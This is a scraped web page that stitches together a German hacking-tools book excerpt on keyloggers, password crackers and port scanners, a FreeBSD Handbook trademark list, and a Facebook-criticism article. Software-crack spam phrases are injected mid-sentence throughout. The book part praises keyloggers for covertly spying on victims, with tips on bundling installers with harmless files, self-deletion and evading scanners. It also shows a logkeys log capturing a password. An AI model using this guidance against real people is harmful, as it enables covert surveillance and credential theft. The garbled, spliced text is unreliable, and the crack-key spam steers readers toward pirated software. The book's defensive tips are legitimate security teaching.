bitte nicht für eine Übertreibung. Ich (PK) hatte eine schöne Sammlung von Schädlingen für weitere Experimente auf meiner Festplatte versammelt. Als ich kurze Zeit später darauf zugreifen wollte, waren die meisten davon nicht mehr vorhanden. Veritas backup exec 20.3 crack - Crack Key For U Antivirustool hatte sie umbenannt und in Quarantäne verschoben. Als ordentlicher Mensch hatte ich natürlich ein Backup gemacht. Aber als ich jetzt die Verzeichnisse öffnen wollte – das alte Spiel, wieder war alles weg. Deshalb müssen Sie im Prinzip drei ziemlich widersprüchliche Ratschläge befolgen: •

Laden Sie Hackertools nur von vertrauenswürdigen Quellen (es gibt durchaus Hacker- oder Security-Seiten wie http://packetstormsecurity.nl, http://www.milw0rm. com/ oder http://www.rootkit.com, die es sind).



Prüfen Sie die Dateien, bevor Sie sie anklicken, ob nicht mehr Malware an Bord ist als sein sollte.



Deaktivieren Sie fallweise Ihren Onlineschutz, um die Tools in ihrer gesamten Bandbreite testen zu können (und lassen Sie hinterher einen oder mehrere Scanner über Ihr System laufen).

Am besten wäre es, wenn Sie diese Tests auf einer in sich gekapselten, virtuellen Maschine ausführen, z. B. von VMware; ersatzweise tut es auch eine separate, bootfähige Festplatte, die Sie nach den Experimenten mit einem Imagebackup wieder in den ursprünglichen Zustand zurückversetzen. Berücksichtigen sollten Sie hierbei natürlich auch die weiteren im Netzwerk befindlichen Rechner: Starten Sie einen aktuellen Wurm

18

Kapitel 1 – Teil I: Tools – Werkzeuge für Angriff und Verteidigung

und sind die restlichen Maschinen Ihres Netzwerks verwundbar, dann eskaliert das ursprünglich zu wissenschaftlichen Zwecken angedachte Szenario zu einem GAU. Eine letzte Warnung müssen wir Ihnen auch noch mit auf den Weg geben. Die meisten der hier vorgestellten Tools – auch wenn sie etwas angejahrt sind – haben ein (immer noch) erhebliches Angriffspotenzial mit der realen Möglichkeit, weniger gut geschützte Systeme bzw. deren Anwender zu schädigen. Das wiederum ist kein Kavaliersdelikt, sondern kann zu strafrechtlichen Konsequenzen führen. Wenn Sie hacken und cracken wollen, dann bitte ausschließlich auf Ihrem eigenen Netzwerk oder nach vorheriger Rücksprache mit Ihren »Testkandidaten«. Was die aktuelle Werkzeugsammlung betrifft: Sie finden hier unterteilt in zehn Rubriken Tools aus der Windows- und Linux-/UNIX-Welt. Unsere Auswahl ist natürlich subjektiv. Wir haben die Programme ausgewählt, mit denen wir in der Praxis gearbeitet haben und noch arbeiten. Darunter sind sehr gängige Werkzeuge wie Nmap, OpenVAS oder das Metasploit Framework, aber auch ausgefallenere Tools wie USBDUMPER2 und der Stealth Recorder. Bei den kommandozeilenbasierten Linux-Tools haben wir jeweils alle relevanten Eingabeparameter und auch das Ausgabeformat in den meisten Fällen vollständig aufgelistet. Wem die Routine mit diesen Tools fehlt, der hat somit gleichzeitig auch ein kleines Nachschlagewerk parat. Wir wünschen Ihnen viel Freude beim Testen und bei der Netzwerkerforschung. Bei der Überarbeitung ist uns ein unliebsamer Effekt begegnet: innerhalb weniger Wochen können die »Lieferadressen« von Underground Tools (selbst wenn sie älteren Ursprungs sind) einfach von der Bildfläche verschwunden sind. So geschehen mit USB Switchblade bzw. 7zBlade. Wir haben uns bemüht, gültige Bezugsquellen Malwarebytes Anti-Malware 4.2.3.195 Crack + License Key Free 2021. Es liegt aber in der Natur der Sache, dass die Halbwertszeit dieser Seiten beschränkt ist. Im Zweifelsfall, der hoffentlich Einzelfall bleiben wird, werden Sie selbst also nach bestimmten hier vorgestellten Tools per Google »nachfassen« müssen. Noch eine letzte Anmerkung zum Stichwort »Redundanz«. Den hier aufgeführten Tools werden Sie zum großen Teil (aber nicht ausschließlich) in unseren Angriffsszenarien begegnen – und sie im konkreten Angriffskontext erleben. Aber wir werden dort wie auch beim Thema Prophylaxe einige weitere Werkzeuge benutzen, die Sie hier nicht finden, weil wir diesen Rahmen nicht sprengen wollten. Es geht uns weniger um die Tools, die in bestimmten Zusammenhängen austauschbar sind, sondern um das konkrete Doing und das dafür notwendige Know-how.

19

1

Keylogger – Spionage par excellence

Der Begriff »Keylogger«, auf Deutsch: Tastaturrekorder, klingt auf den ersten Blick eher harmlos. Keylogger sind aber eine der größten Gefahren, denen sich Privatpersonen und Firmen heute ausgesetzt sehen. Keylogger existieren als Hardware- und als Softwareausführung. Ihr Zweck ist derselbe: alles aufzuzeichnen, was der Anwender auf der Tastatur seines PCs eingibt: •

CMOS-Passwörter



Benutzeraccounts



PIN-/TAN-Kombinationen fürs Online-Banking



Login-Daten für diverse Webdienste (E-Mail-Accounts, Forenanmeldungen etc.)



Passwörter zum Verschlüsseln von Festplatten, Verzeichnissen, Dateien



Zusätzlich natürlich alle Texte in Eingabemasken, Formularen, Chatrooms etc.

Manche Keylogger speichern auch Screenshots, damit der Angreifer auch die anderen visuellen Aktivitäten seiner Opfer mitverfolgen kann. Besonders heimtückisch sind Keylogger, die als Hardwaremodul zwischen Tastatur und Rechner eingeschleift werden und dabei alle Daten von der Tastatur mitschneiden, bevor sie über das Betriebssystem an das jeweilige Anwenderprogramm übergeben werden. Die Softwarefraktion geht einen anderen Weg: Meist wird hier ein Treiber installiert – vorzugsweise auf Kernelebene –, der vom Benutzer völlig unbemerkt alle Eingaben abfängt, aufzeichnet und dann an das jeweilige Programm übergibt. Die Keylogger, die wir hier vorstellen, sind Standalone-Produkte. Daneben findet sich die Funktionalität von Keyloggern auch in diversen Malware- und Spyware-Programmen installiert, insbesondere in Trojanern und RATs (Remote Access Tools). Die Funktionalität der SW-Keylogger ist ziemlich ausgereift. So gibt es Programme, die nicht nur Sessions mitschneiden (via Screenshots oder auch als kleine Filme), Tastatureingaben protokollieren, die Eingaben verschlüsseln und ihre Spuren mittels Rootkits tarnen, sondern auch Spezialentwicklungen, um gezielt Daten auszulesen und diese dann durch die Firewall nach außen schmuggeln zu können. Keylogger lassen sich natürlich auch zu Verteidigungszwecken nutzen, beispielsweise um Betrugsfällen und dem Ausspionieren von Firmengeheimnissen auf die Spur zu kommen. In Deutschland fallen diesbezügliche Aktivitäten (im Übrigen wie fast alle hier beschriebenen Tools) unter das Strafgesetzbuch § 202a – Ausspähen von Daten – und sind damit strafbewehrt bzw. nur in geregelten Ausnahmefällen zulässig.

20

Kapitel 1 – Keylogger – Spionage par excellence

1.1

Logkeys

Anbieter

http://code.google.com/p/logkeys

Betriebssystem(e) Linux/UNIX Kategorie(n)

Keylogger

Größe

< 1 MB

Usability



Installation / Kompilation

Preis

-

Sprachen

Englisch

Oberfläche

GUI

CMD x

Nein / Schnittstellen Ja 

Know-how

Bei Logkeys handelt es sich um einen Keylogger für Linux, der sowohl auf seriellen als auch auf USB-Tastaturen läuft. Logkeys erfasst und protokolliert sämtliche Eingaben, die auf der Tastatur eingegeben werden. Logkeys übersetzt die eingegebenen Zeichen in das ASCII-Format. Der Einsatz von Logkeys mit folgenden Parametern: •

-s start logging keypresses



-o log output to FILE [/var/log/logkeys.log]

bringt z. B. folgendes Ergebnis: sh-3.2# cat /var/log/logkeys.log Logging started . 2010-03-10 2010-03-10 2010-03-10 2010-03-10 2010-03-10 2010-03-10 (.) 2010-03-10 2010-03-10 sh-3.2#

19:35:18+0000 19:35:35+0000 19:46:46+0000 19:46:55+0000 19:47:22+0000 19:47:29+0000

> > > > > >

uname -a ps -aux useradd -m hweber passwd hweber maxtor19! maxtor19!

19:47:47+0000 > aptitude update 19:48:05+0000 > exit

Bild 1.1: Logkeys beim Aufzeichnen von Tastatureingaben

1.2

Elite Keylogger Trial, ab 49 €

Anbieter

www.widestep.com

Preis

Betriebssystem(e)

Win Vista x32, XP, 2000

Sprachen

Englisch

Kategorie(n)

Keylogger

Oberfläche

GUI

AVG Secure VPN License key < 5 MB

Usability



Installation

Ja Know-how

x

Schnittstellen 

CMD

1.2 Elite Keylogger

21

Nach unseren Tests gehört der Elite Keylogger V. 4.5 (Stand IV/2009) nach wie vor zu den besten (Funktionalität) und technologisch fortgeschrittensten Vertretern seiner Art. Er zeigt, was heute in dem Bereich machbar ist, um selbst misstrauische und erfahrene PC-Anwender unbemerkt und effektiv auszuspionieren. Da es sich beim Elite Keylogger um ein kommerzielles Produkt handelt, ist er ziemlich gut getarnt vor den meisten Viren- und Malware-Scannern. Sein Tarnmantel ist so gut, dass er mit herkömmlichen Betriebssystemmitteln nicht entdeckt werden kann. Die einzige Möglichkeit, ihm beizukommen, ist der Einsatz von Antirootkits. Besonders hervorzuheben ist seine Fähigkeit, die protokollierten Daten applikationsspezifisch auswerten zu können, d. h., man sieht auf einen Blick, welche Briefe in Word geschrieben, welche Tabellen in Excel angelegt, welche E-Mails mit welchen Inhalten verschickt bzw. in welchen Chats welche Dialoge geführt wurden. Das erleichtert die Auswertung nicht unbeträchtlich. Ein herausragendes Feature ist die Verteilung der Logs auf andere Rechner im Netz. Man muss sich nicht mehr via E-Mail informieren lassen (und gegebenenfalls verdächtige Meldungen der Firewall riskieren), um in aller Veritas backup exec 20.3 crack - Crack Key For U Daten sammeln und auswerten zu können. Der fürs Unsichtbarmachen zuständige Kerneltreiber wird in regelmäßigen Abständen aktualisiert.

Bild 1.2: Komfortabel und unsichtbar

22

Kapitel 1 – Keylogger – Spionage par excellence

1.3

Ardamax Keylogger

Anbieter

www.ardamax.com

Preis

Trial, ab 28,95 €

Betriebssystem(e)

2000/XP/Vista/Windows 7

Sprachen

Englisch

Kategorie(n)

Keylogger

Oberfläche

GUI

Größe

> 5 MB

Usability



Installation

Ja Know-how

x

CMD

Schnittstellen 

Nicht vom Leistungsumfang, wohl aber von der Dateigröße einer der kleinsten (und unauffälligsten) Keylogger. Die OBS Studio 27.0.1 Crack + Serial Key Free Download 2021 ist sehr simpel; in wenigen Minuten ist der Keylogger konfiguriert und unsichtbar gemacht. Zwei Highlights haben uns besonders gut gefallen: •

Die Möglichkeit, ein Remote- bzw. Servermodul zu konfigurieren, das man z. B. mit einem anderen nützlichen Programm bündeln und einem ahnungslosen Opfer zuschicken kann. Vorteil: Man muss den Keylogger nicht vor Ort installieren.



Die Eingabe eines künstlichen Verfalldatums. Das kann sehr nützlich sein, wenn man sein Opfer nur über eine definierte Zeitspanne überwachen kann oder muss: Danach deinstalliert sich das Programm völlig unbemerkt.

Bild 1.3: Auswertungsfenster Keylogger

1.4 Stealth Recorder Pro

23

Die Logs sind verschlüsselt; man kann sie sich als HTML-Report via E-Mail zuschicken oder über einen FTP-Server bzw. relativ leicht übers LAN an eine geheime Adresse verschicken lassen.

1.4

Stealth Recorder Pro

Anbieter

Über Distributor lieferbar, z. B. www.brothersoft.com

Preis

Trial, ab 39,95 $

Betriebssystem(e)

Windows

Sprachen

Englisch

Kategorie(n)

Keylogger

Oberfläche

GUI

Größe

< 500 KB

Usability



Installation

Ja Know-how

x

CMD

Schnittstellen 

Eigentlich kein Keylogger im strengen Sinn des Wortes, sondern eine Audiowanze mit verblüffendem Funktionsumfang. Ziel des Angriffs sind Gespräche, die in der Nähe des Rechners oder Notebooks geführt werden. Eigene Tests ergaben, dass selbst mit einem günstigen Notebook alles aufgezeichnet werden kann, was im Umkreis von mehr als 10 m gesprochen wird. Möglich wird dies durch eine neuartige Boostertechnologie, die den Input eines handelsüblichen Mikrofons um mehr als das 100-Fache verstärken kann. Die Software zeichnet – in Abhängigkeit des gewählten Umgebungspegels – jedes gesprochene bzw. geflüsterte Wort im mp3-Format (unterschiedliche Qualitätsstufen wählbar) auf und versendet diese Dateien via E-Mail oder FTP. Ein besonderes Schmankerl driver easy pro free download die Fernabfragemöglichkeit. Dadurch ist es einem Angreifer von außen möglich, über einen definierten Port auf die MP3-Dateien zuzugreifen. Man muss die Software nicht unbedingt einem potenziellen Opfer aufs Notebook oder den Rechner packen, sondern kann sie auf seinem eigenen Notebook installieren und in Meetings platziert einsetzen. Bei vielen Notebooks besteht ja der Vorteil darin, dass man kein separates Mikrofon braucht, sondern dieses bereits eingebaut ist.

Bild 1.4: Zugriff auf die Audiowanze von außen

24

Kapitel 1 – Keylogger – Spionage par excellence

1.5

Elite Keylogger V.1

Anbieter

www.hackinglibrary.ws

Preis

-

Betriebssystem(e)

Windows

Sprachen

Englisch

Kategorie(n)

Keylogger

Oberfläche

GUI

Größe

< 1 MB

Usability



Installation

Ja

x

CMD

Schnittstellen 

Know-how

Nein, kein Schreibfehler, keine Vorgängerversion, sondern ein eigenständiges Hackerprodukt mit gewissen Vorzügen. Z. B. kann man den erzeugten Remote-Installer noch mit einem anderen, harmlosen Produkt, u. a. einer kleinen Videodatei, bündeln, damit das Opfer keinen Verdacht schöpft. Zusätzlich kann man die Abhöraktion zeitlich auch begrenzen, quasi mit einem Verfallsdatum versehen, was die Gefahr, entdeckt zu werden, ebenfalls minimiert.

Bild 1.5: Keylogger als typisches Hackertool

1.6

Hardware-Keylogger

Anbieter

ebay oder www.thinkgeek.com

Preis

Ab 19,00 €

Betriebssystem(e)

unabhängig

Sprachen

Englisch

Kategorie(n)

Keylogger

Oberfläche

GUI x

Größe

< 2 MB

Installation

Ja

Schnittstellen

CMD

1.6 Hardware-Keylogger

25

Features

Usability



Know-how



Bild 1.6: Hardware-Keylogger bei eBay

Hardware-Keylogger können wahlweise an den PS2- oder USB-Port des Zielrechners eingeschleift werden, optional gibt es auch Module, die in die Tastatur eingebaut werden oder spezielle Tastaturen. Da diese Keylogger auf Hardware basieren, können sie mit keiner Software entdeckt werden. Sie speichern je nach Ausführung bis zu einige Millionen Zeichen inklusive CMOS-Passwort, Verschlüsselungscodes für die Festplatte etc. Wenn man veritas backup exec 20.3 crack - Crack Key For U wieder vom Rechner abzieht, können sie später in geschützter Umgebung mit einem mitgelieferten Programm oder einem simplen Texteditor ausgelesen werden.

Bild 1.7: Auslesen des Hardware-Keyloggers

26

Kapitel 1 – Keylogger – Spionage par excellence

Hardware-Keylogger zählen zu den gefährlichsten Spionagetools, weil sie a) einfach und preiswert zu beschaffen, b) schnell zu installieren und c) relativ einfach auszuwerten sind. Außerdem helfen sie, den Verschlüsselungsschutz von Festplatten mit PBA (Pre Boot Authentication) zu brechen. Die Abwehrmöglichkeiten sind beschränkt: Visuelle Inspektion des Rechners in regelmäßigen Abständen sowie Einsatz von Smartcards und Tokens, in Kombination mit einer Festplattenverschlüsselung können helfen, den Schaden zu begrenzen.

1.7

Abwehr – generelle Tipps

Grundsätzlich sind bei den Abwehrstrategien zwei Szenarien zu unterscheiden: Prophylaxe auf der einen und Unschädlichmachen auf der anderen Seite. Im ersten Fall droht der unmittelbare Angriff von Keyloggern, während er im zweiten Fall bereits erfolgt ist. Hardware-Keylogger abzuwehren ist eine der anspruchsvollsten Verteidigungsmaßnahmen, da hier allein mit Software wenig auszurichten ist. In der Praxis kommen prinzipiell nur drei Maßnahmen in Betracht: 1. Physikalische Schutzmaßnahmen Sensible PCs werden vor feindlichen Zugriffsversuchen physisch geschützt (z. B. durch Personenkontrolle, Wegschließen etc.), bzw. die Hardware (PC-Gehäuse und Peripherie wie Tastaturen etc.) wird regelmäßig auf Manipulationen untersucht. 2. Festplattenverschlüsselung mit Pre Boot Authentication via Chipkarte, USB-Stick etc. (2-Faktoren Authentifizierung) Diese Maßnahme verhindert, dass das Startpasswort ausgespäht und damit die BootKontrolle über den PC übernommen werden kann, da grundsätzlich nur die Tastatureingabe, aber nicht der Hardwareschlüssel der Chipkarte mitprotokolliert werden kann. 3. Einsatz virtueller, mausgesteuerter Tastaturen & Passwortsafes Hardware-Keylogger speichern nur reale Tastendrücke, aber keine dezidierten Mausbewegungen bzw. Mausklicks. Ohne physikalische Absicherung bleiben die Maßnahmen 2 und 3 allerdings Stückwerk. Man wird zwar mehr oder weniger zuverlässig das Ausspähen von Anmeldekennungen und Passwörtern verhindern können, schwerlich aber die Kompletteingabe größerer Textmengen, da virtuelle Tastaturen nicht für die Eingabe größerer Textmengen gedacht sind. Softwarebasierte Keylogger sind zwar grundsätzlich einfacher abzuwehren, bergen aber auch größere Gefahrenpotenziale (breitere Einsatzmöglichkeiten, fast unbeschränkte Speichermöglichkeiten, Fernzugriff, auch von Laien leicht einzusetzen). Ist der PC verschlüsselt bzw. der Zugang physikalisch erschwert, kommen als Infektionsquellen nur speziell präparierte Datenträger (CD, DVD, USB-Sticks, Festplatten etc.) oder verseuchte Webseiten und Mailanhänge in Betracht. Da im Bereich der Industriespionage häufig dezidierte Lösungen eingesetzt werden, laufen gängige signaturbasierte Malwarescannner häufig ins Leere. Hier helfen dann Speziallösungen wie der kernelbasierte Anti Keylogger Elite, der auch unbekannte Keylogger in Echtzeit schachmatt setzt.

1.7 Abwehr – generelle Tipps

27

Schwächer sind virtuelle Tastaturen (da auch Mausbewegungen in Kombination mit Screenshots aufgenommen werden können). Einfache Lösungen, um das Ausspähen von Kennungen und Passwörter via Internetbrowser zu erschweren, sind Add-Ons wie Key Scrambler & Co. Da die Softwareprophylaxe immer einem gewissen Unsicherheitsfaktor unterliegt, sollten fortschrittliche Diagnosetechniken wie Anti-Rootkits, Netzwerkmonitore, IDS etc. eingesetzt werden. Eine weitere, simple Möglichkeit ist der Ausbau einer verdächtigen Bootpartition/-platte. Da hier kein Rootkit mehr die protokollierten Mitschnitte schützt, kann man eine datumsbasierte Dateisuche starten (größere Dateien der letzten Tage), um Protokolldateien von Keyloggern zu entdecken. Sind diese Dateien nur im ausgebauten Zustand auf der Platte zu entdecken, nicht aber im laufenden Betrieb, kann man mit einiger Sicherheit davon ausgehen, dem Übeltäter auf die Schliche gekommen zu sein.

29

2

Passwort-Knacker: Wo ein Wille ist, ist auch ein Weg

Für viele Funktionen des Betriebssystems, des Netzwerks und vieler Anwenderprogramme existieren Passwörter, die vorzugsweise sicherstellen sollen, dass nur autorisierte Personen unter anderem diese Funktionen nutzen: •

CMOS-Passwort



Administratorpasswort



User-Logins



Windows CD-Key



Netzpasswörter



User-Passwörter



Wireless (WPA-PSK/WPA2) Encryption Keys

Wer sich als Angreifer Zugriff auf fremde Netze bzw. fremde Computer verschaffen will, muss hier etliche Hürden nehmen. Grundsätzlich können Passwörter umgangen bzw. außer Kraft gesetzt oder durch entsprechende Attacken (Dictionary / Brute Force / Rainbow Tables) geknackt werden. Die hier exemplarisch vorgestellten Tools repräsentieren aus unserer Sicht die leistungsfähigsten Angriffswerkzeuge, wobei nicht verschwiegen werden soll, dass auch Knackwerkzeuge durchaus einen legitimen Sinn haben können, z. B. den Zugriff dort zu ermöglichen, wo der Anwender schlicht und einfach sein Passwort vergessen hat, oder für den gewissenhaften Administrator, der die Härte von Userkennwörtern testet, um möglichen Angreifern zuvorzukommen. Ansonsten gilt es, den § 202c StGB (»Hackerparagraphen«) zu beachten, der das Ausspähen fremder Daten unter Strafe stellt.

2.1

CMOSPwd

Anbieter

www.cgsecurity.org

Preis

-

Betriebssystem(e)

Windows, Linux, BSD

Sprachen

Englisch

Kategorie(n)

Passwort-Cracker

Oberfläche

Größe

< 300 KB

Usability



Installation

GUI

Nein

Schnittstellen

Know-how



CMD x

Ein simples, aber wirkungsvolles Werkzeug, um die Kontrolle über einen fremden PC zu erlangen – ohne dass dafür ein Keylogger eingesetzt oder zum Schraubenzieher gegriffen werden muss. Einzige Voraussetzung: Der PC muss sich booten lassen. Danach kann über eine DOS-Startdisk oder auch über Windows das Passwort ausgelesen werden.

30

Kapitel 2 – Passwort-Knacker: Wo ein Wille ist, ist auch ein Weg

Bild 2.1: Auslesen des BIOS-Passworts

2.2

Hydra

Anbieter

http://freeworld.thc.org/thc-hydra Preis

Betriebssystem(e) Linux/UNIX, Mac OS X, Cygwin unter Windows, ARM-Linux und PalmOS

Sprachen

Kategorie(n)

Login Passwort-Cracker (Remote) Oberfläche

Größe

< 2 MB

Usability



Installation / Kompilation Know-how

Englisch

GUI

Nein / Schnittstellen Ja 

x CMD x Benötigt libssh

Bei diesem Tool handelt es sich um einen Passwort-Cracker, der mittels Wörterbuchattacke versucht, die Kennwörter entfernter Logins verschiedenster Dienste zu ermitteln. Hydra zeichnet sich durch die Möglichkeit aus, parallele Attacken auf diverse Dienste zu fahren, unterstützt Verbindungen über SSL / Proxy-Server und simuliert die Netzwerkprotokolle Telnet, FTP, POP3[-ntlm], IMAP[-ntlm], SMB, SMBNT, HTTP[s]{head pw-inspector -m 8 -M 63 > all_863_password_8-63.lst [email protected]:~#

Bild 2.12: PW-Inspector beim Optimieren einer Passwortliste

2.14

Abwehr – generelle Tipps

Wer verhindern will, dass seine Dokumente und Zugangspasswörter von nicht legitimierten Personen bzw. Institutionen entschlüsselt werden, sollte sich insbesondere den Zusammenhang von Passwortlänge und Brute-Force-Attacken9 vergegenwärtigen. Nehmen wir an, wir nutzten für ein siebenstelliges Passwort einen Zeichenvorrat von 26 7 Zeichen. Theoretisch ergibt das 26 = 8.031.810.176 Kombinationen – für Laien eine unvorstellbar große, Sicherheit vorgaukelnde Zahl. Sie relativiert sich, wenn man davon ausgeht, dass der schnellste Einzel-PC mit Spezialsoftware etwa 800 – 850 Millionen10 Kennwörter pro Sekunde generieren kann (Stand Ende Dezember 2009). Dieser

9

vgl. den sehr instruktiven Aufsatz unter www.1pw.de/brute-force.html

10

vgl. Nr. 2, Mai 2009, Passwort 2010 – Sichere Gestaltung und Verwaltung von Passwörtern, S. 6. ff.

2.14 Abwehr m3 data recovery 5.8 full - Activators Patch generelle Tipps

43

bräuchte weniger als 10 Sekunden, um das Passwort zu knacken. Wäre indes der 8 Schlüssel nur ein Zeichen länger, käme man bereits auf 26das sind mehr als 208 Milliarden unterschiedlicher Kombinationen, wodurch der Entschlüsselungsaufwand auf ca. 4 Minuten ansteigen würde. Passwörter, die Klein- und Großbuchstaben sowie Zahlen nutzen (62 Zeichen) und eine Länge von z. B. zwölf Zeichen aufwiesen, bräuchten zur Entschlüsselung über 126 000 Jahre. Gegen Wörterbuchattacken verteidigt man sich am besten durch nichtsemantische Wortphrasen, z. B. »I,PK,b1954iG,Rhg« (steht für den Merksatz »Ich, Peter Kraft, bin 1954 in Guntersblum, Rheinhessen geboren«. Da sich solche Passwörter aber letztlich nur schwer memorieren lassen, verwendet man dafür am besten einen sicheren Passwortsafe, wie z. B. KeePass (kostenlos unter http://keepass.info). Gegen den Einsatz vorberechneter Hash-Werte via Rainbow Tables11 schützt ebenfalls die Verwendung einer langen, nicht sprechenden Passwortphrase. Der Einsatz schwacher, leicht zu brechender Passwörter durch Anwender ist insbesondere für Firmen problematisch. Hier bedarf es konkreter Passwortrichtlinien (Länge, Symbolraum, Wechselrhythmus etc.), die auf Wirksamkeit regelmäßig in Audits überprüft werden, sowie Tools, die eine einfache und sichere Speicherung von Passwörtern verwalten können.

11

Vgl. Peter Kraft. Anti Hackerz Book 2009, Kapitel 11.4, Schutz vor Passwortattacken, Poing 2008, S. 256 – 260

45

3

An den Toren rütteln: Portscanner & Co.

Portscanner testen, welche Dienste ein mit TCP/IP oder UDP arbeitendes System nach außen anbietet. Obwohl sich mit exzessiven Portscans auch Pufferüberläufe und Systemcrashs auf dem Zielrechner provozieren lassen – man spricht hier von Denial of Service-Angriffen –, zählen Portscanner nicht per se zu den klassischen Einbruchswerkzeugen. Ihre Berechtigung haben sie vorzugsweise dort, wo man schnell seine eigenen Rechner auf mögliche Dienste und deren Verwundbarkeit checken will, ohne gleich zu einem Security-/Vulnerability-Scanner, wie sie u. a. für Sicherheitsaudits benutzt werden, zu greifen. Für Angriffe auf fremde Rechner (Hosts) sind u. a. folgende Szenarien denkbar: TCP Connect Scan Die bekannteste und einfachste Scanmethode mittels des connect()-Systemaufrufs für den Portscan. Bei einem erfolgreichen Systemaufruf auf der anderen Seite kann auf einen offenen Port als potenzielles Angriffsziel geschlossen werden. Obwohl die Verbindung mit close() sofort wieder geschlossen wird, wird diese meistens hostseitig protokolliert, d. h., der Ursprung des Portscans kann zurückverfolgt werden. Kam keine Verbindung zustande, ist der Port des Zielrechners geschlossen und scheidet damit als Angriffsziel aus. TCP SYN Scan Gelegentlich auch als Stealth- oder als halb offener Scan bezeichnet, da keine vollständige TCP-Verbindung zum Zielrechner aufgebaut wird. Im ersten Schritt sendet der Angreifer ein SYN-Paket an den Host und gibt damit vor, eine normale Verbindung aufbauen zu wollen. Schickt der Host ein SYN

FreeBSD Handbook

FreeBSD is a registered trademark of Wind River Systems, Inc. This is expected to change soon.

3Com and HomeConnect are registered trademarks of 3Com Corporation.

3ware and Escalade are registered trademarks of 3ware Inc.

ARM is a registered trademark of ARM Limited.

Adaptec is a registered trademark of Adaptec, Inc.

Adobe, Acrobat, Acrobat Reader, and PostScript are either registered trademarks or trademarks of Adobe Systems Incorporated in the United States and/or other countries.

Apple, FireWire, Mac, Macintosh, Mac OS, Quicktime, and TrueType are trademarks of Apple Computer, Inc., registered in the United States and other countries.

Corel and WordPerfect are trademarks or registered trademarks of Corel Corporation and/or its subsidiaries in Canada, the United States and/or other countries.

Sound Blaster is a trademark of Creative Technology Ltd. in the United States and/or other countries.

Heidelberg, Helvetica, Palatino, and Times Roman are either registered trademarks or trademarks of Heidelberger Druckmaschinen AG in the U.S. and other countries.

IBM, AIX, EtherJet, Netfinity, OS/2, PowerPC, PS/2, S/390, and ThinkPad are trademarks of International Business Machines Corporation in the United States, other countries, or both.

IEEE, POSIX, and 802 are registered trademarks of Institute of Electrical and Electronics Engineers, Inc. in the United States.

Intel, Celeron, EtherExpress, i386, i486, Itanium, Pentium, and Xeon are trademarks or registered trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

Intuit and Quicken are registered trademarks and/or registered service marks of Intuit Inc., or one of its subsidiaries, in the United States and other countries.

Linux is a registered trademark of Linus Torvalds in the United States.

LSI Logic, AcceleRAID, eXtremeRAID, MegaRAID and Mylex are trademarks or registered trademarks of LSI Logic Corp.

M-Systems and DiskOnChip are trademarks or registered trademarks of M-Systems Flash Disk Pioneers, Ltd.

Macromedia, Flash, and Shockwave are trademarks or registered trademarks of Macromedia, Inc. in the United States and/or other countries.

Microsoft, FrontPage, MS-DOS, Outlook, Windows, Windows Media, and Windows NT are either registered trademarks or trademarks of Microsoft Corporation in the United States and/or other countries.

Netscape and the Netscape Navigator are registered trademarks of Netscape Communications Corporation in the U.S. and other countries.

Motif, OSF/1, and UNIX are registered trademarks and IT DialTone and The Open Group are trademarks of The Open Group in the United States and other countries.

Oracle is a registered trademark of Oracle Corporation.

PowerQuest and PartitionMagic are registered trademarks of PowerQuest Corporation in the United States and/or other countries.

RealNetworks, RealPlayer, and RealAudio are the registered trademarks of RealNetworks, Inc.

Red Hat, RPM, are trademarks or registered trademarks of Red Hat, Inc. in the United States and other countries.

SAP, R/3, and mySAP are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world.

Sun, Sun Microsystems, Java, Java Virtual Machine, JavaServer Pages, JDK, JSP, JVM, Netra, Solaris, StarOffice, Sun Blade, Sun Enterprise, Sun Fire, SunOS, and Ultra are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries.

Symantec and Ghost are registered trademarks of Symantec Corporation in the United States and other countries.

MATLAB is a registered trademark of The MathWorks, Inc.

SpeedTouch is a trademark of Thomson

U.S. Robotics and Sportster are registered trademarks of U.S. Robotics Corporation.

VMware is a trademark of VMware, Inc.

Waterloo Maple and Maple are trademarks or registered trademarks of Waterloo Maple Inc.

Mathematica is a registered trademark of Wolfram Research, Inc.

XFree86 is a trademark of The XFree86 Project, Inc.

Ogg Vorbis and Xiph.Org are trademarks of Xiph.Org.

Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in this document, and the FreeBSD Project was aware of the trademark claim, the designations have been followed by the ``™'' or the ``®'' symbol.

[ Split HTML / Single HTML ]


Источник: https://docs.huihoo.com/freebsd/handbook/book.html

Veritas backup exec 20.3 crack - Crack Key For U -

Criticism of Facebook

Media coverage of the shortcomings of Facebook's market dominance

The criticism of Facebook has led to international media coverage and significant reporting of its legal troubles and the outsize influence it has on the lives and health of its users and employees, as well on its influence on the way media, specifically news, is reported and distributed. Notable issues include Internet privacy, such as use of a widespread "like" button on third-party websites tracking users,[1][2] possible indefinite records of user information,[3] automatic facial recognition software,[4][5] and its role in the workplace, including employer-employee account disclosure.[6] The use of Facebook can have negative psychological effects that include feelings of romantic jealousy[7][8] and stress,[9][10] a lack of attention,[11] and social media addiction that in some cases is comparable to drug addiction.[12][13]

Facebook's operations have also received coverage. The company's electricity usage,[14]tax avoidance,[15]real-name user requirement policies,[16]censorship policies,[17][18]handling of user data,[19] and its involvement in the United States PRISM surveillance program have been highlighted by the media and by critics.[20] Facebook has come under scrutiny for 'ignoring' or shirking its responsibility for the content posted on its platform, including copyright and intellectual property infringement,[21]hate speech,[22][23] incitement of rape[24] and terrorism,[25][26]fake news,[27][28][29]Facebook murder, crimes, and violent incidents live-streamed through its Facebook Live functionality.[30][31][32]

The company and its employees have also been subject to litigation cases over the years,[33][34][35][36] with its most prominent case concerning allegations that CEO Mark Zuckerberg broke an oral contract with Cameron Winklevoss, Tyler Winklevoss, and Divya Narendra to build the then-named "HarvardConnection" social network in 2004, instead allegedly opting to steal the idea and code to launch Facebook months before HarvardConnection began.[37][38][39] The original lawsuit was eventually settled in 2009, with Facebook paying approximately $20 million in cash and 1.25 million shares.[40][41] A new lawsuit in 2011 was dismissed.[42] Some critics make predictions of Facebook's end based on the problems which they identify. Facebook has been banned by several governments for various reasons, including Syria,[43] China,[44] and Iran.[45]

Privacy issues[edit]

Main article: Privacy concerns with Facebook

Facebook has faced a number of privacy concerns; for instance, in August 2019, it was revealed that the company had enlisted contractors to generate transcripts of users' audio chats.[46][47][48] In part these concerns stem from the company's revenue model that involves selling information about its users, and the loss of privacy this could entail. In addition, employers and other organizations and individuals have been known to use Facebook data for their own purposes. As a result peoples' identities have sometimes been revealed without their permission. In response, pressure groups and governments have increasingly asserted the users' right to privacy and to control their personal data.

